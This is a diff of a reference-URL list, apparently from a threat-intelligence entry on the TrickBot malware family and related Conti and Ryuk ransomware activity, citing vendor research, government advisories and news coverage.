- "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://community.riskiq.com/article/04ec92f4",
- "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/",
- "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
- "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html",
- "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/",
- "https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/",
- "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features",
- "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
- "https://www.mandiant.com/media/12596/download",
- "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf",
- "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
- "https://share.vx-underground.org/Conti/",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
- "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html",
- "https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass",
- "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
- "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
- "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
- "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
- "https://www.bleepingcomputer.com/news/security/trickbot-now-uses-a-windows-10-uac-bypass-to-evade-detection/",
- "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns",
- "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
- "https://cyber.wtf/2020/08/31/trickbot-rdpscandll-password-transof/",
- "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
- "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
- "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes",
- "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre",
- "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
- "https://www.wired.com/story/trickbot-malware-group-internal-messages/",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://www.bleepingcomputer.com/news/security/trickbot-malware-mistakenly-warns-victims-that-they-are-infected/",
- "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html",
- "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/",
- "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
- "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/",
- "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/",
- "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/",
- "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412",
- "https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf",
- "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
- "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c",
- "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/",
- "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/",
- "https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/",
- "https://www.wired.co.uk/article/trickbot-malware-group-internal-messages",
- "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
- "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/",
- "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
- "https://www.joesecurity.org/blog/498839998833561473",
- "https://intel471.com/blog/conti-leaks-ransomware-development",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html",
- "https://cofenselabs.com/all-you-need-is-text-second-wave/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/VK_Intel/status/1328578336021483522",
- "https://twitter.com/anthomsec/status/1321865315513520128",
- "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf",
- "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
- "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/",
- "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
- "https://www.youtube.com/watch?v=EdchPEHnohw",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
- "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/",
- "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573",
- "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez",
- "https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://duo.com/decipher/trickbot-up-to-its-old-tricks",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html",
- "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis",
- "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/22/trickbot-fake-ips-part2.html",
- "https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module",
- "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
- "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/",
- "https://labs.vipre.com/trickbots-tricks/",
"https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/",
+ "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
+ "https://hurricanelabs.com/splunk-tutorials/splunking-with-sysmon-part-4-detecting-trickbot/",
+ "https://home.treasury.gov/news/press-releases/jy1256",
+ "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html",
"https://www.youtube.com/watch?v=KMcSAlS9zGE",
- "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "http://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html",
- "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html",
- "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf",
- "https://therecord.media/trickbot-new-attacks-see-the-botnet-deploy-new-banking-module-new-ransomware/",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/",
- "https://www.youtube.com/watch?v=Brx4cygfmg8",
+ "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf",
+ "https://labs.vipre.com/trickbots-tricks/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
"https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks",
- "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html",
- "https://www.justice.gov/opa/pr/russian-national-extradited-united-states-face-charges-alleged-role-cybercriminal",
- "https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/",
- "https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/",
- "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
- "https://www.secureworks.com/research/threat-profiles/gold-blackburn",
- "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/",
- "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/",
- "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/",
- "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
- "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf",
- "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/",
+ "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-076a",
"https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor",
- "https://blog.vincss.net/2021/10/re025-trickbot-many-tricks.html",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/",
- "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
- "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/",
- "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
- "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://securelist.com/trickbot-module-descriptions/104603/",
+ "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/",
+ "https://community.riskiq.com/article/04ec92f4",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
+ "https://www.gosecure.net/blog/2021/12/03/trickbot-leverages-zoom-work-from-home-interview-malspam-heavens-gate-and-spamhaus/",
+ "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly/",
- "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
- "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
- "https://arcticwolf.com/resources/blog/karakurt-web",
- "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html",
- "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html",
- "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/",
- "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/",
- "https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/",
- "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/",
- "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html",
- "https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/",
- "https://www.hornetsecurity.com/en/security-information/trickbot-malspam-leveraging-black-lives-matter-as-lure/",
- "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
- "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/",
- "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
- "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html",
- "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://community.riskiq.com/article/111d6005/description",
"https://www.advintel.io/post/the-trickbot-saga-s-finale-has-aired-but-a-spinoff-is-already-in-the-works",
- "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737",
- "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.justice.gov/opa/press-release/file/1445241/download",
- "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/",
- "http://www.malware-traffic-analysis.net/2018/02/01/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
- "https://community.riskiq.com/article/298c9fc9",
- "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/",
- "https://www.splunk.com/en_us/blog/security/detecting-trickbots.html",
- "https://intel471.com/blog/privateloader-malware",
- "https://blogs.microsoft.com/on-the-issues/2020/10/20/trickbot-ransomware-disruption-update/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
+ "https://unit42.paloaltonetworks.com/banking-trojan-techniques/",
"https://unit42.paloaltonetworks.com/ryuk-ransomware/",
- "https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
+ "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/",
+ "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure",
+ "https://www.youtube.com/watch?v=EdchPEHnohw",
+ "https://www.welivesecurity.com/2020/10/12/eset-takes-part-global-operation-disrupt-trickbot/",
+ "https://unit42.paloaltonetworks.com/trickbot-campaign-uses-fake-payroll-emails-to-conduct-phishing-attacks/",
+ "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/",
"https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf",
- "https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056",
- "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
- "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group",
- "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
- "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.youtube.com/watch?v=lTywPmZEU1A",
- "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/",
+ "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/",
+ "https://cofenselabs.com/all-you-need-is-text-second-wave/",
+ "https://www.secdata.com/the-trickbot-and-mikrotik/",
+ "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module",
+ "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html",
+ "https://therecord.media/trickbot-gang-shuts-down-botnet-after-months-of-inactivity/",
"https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/",
- "https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/",
- "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/",
+ "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
+ "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/",
+ "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/",
+ "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
+ "https://www.kryptoslogic.com/blog/2022/01/deep-dive-into-trickbots-web-injection/",
+ "https://www.wired.com/story/trickbot-malware-group-internal-messages/",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis",
+ "https://www.bleepingcomputer.com/news/security/trickbot-now-steals-windows-active-directory-credentials/",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-of-trickbot-new-module-pwgrab.html",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
+ "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html",
+ "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/",
+ "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/",
+ "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/",
+ "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
+ "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/",
+ "https://arcticwolf.com/resources/blog/karakurt-web",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://osint.fans/service-nsw-russia-association",
+ "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
+ "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html",
+ "https://securelist.com/trickbot-module-descriptions/104603/",
+ "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/10/HP-Wolf-Security-Threat-Insights-Report-Q3-2021.pdf",
+ "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident",
+ "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/",
+ "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/",
+ "https://labs.bitdefender.com/2020/11/trickbot-is-dead-long-live-trickbot/",
+ "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/",
+ "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth",
+ "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot",
+ "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.cert.pl/en/news/single/detricking-trickbot-loader/",
+ "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users",
+ "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre",
+ "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-reversing-the-dropper-variant/",
+ "https://www.splunk.com/en_us/blog/security/detecting-trickbots.html",
+ "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "http://www.malware-traffic-analysis.net/2018/02/01/",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
+ "https://www.infosecurity-magazine.com/blogs/trickbot-mikrotik-connection/",
+ "https://research.checkpoint.com/2022/a-modern-ninja-evasive-trickbot-attacks-customers-of-60-high-profile-companies/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/399/Bitdefender-PR-Whitepaper-Trickbot-creat5515-en-EN.pdf",
+ "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.govcert.ch/blog/37/trickbot-an-analysis-of-data-collected-from-the-botnet",
+ "https://www.reuters.com/technology/details-another-big-ransomware-group-trickbot-leak-online-experts-say-2022-03-04/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/316/Bitdefender-Whitepaper-TrickBot-en-EN-interactive.pdf",
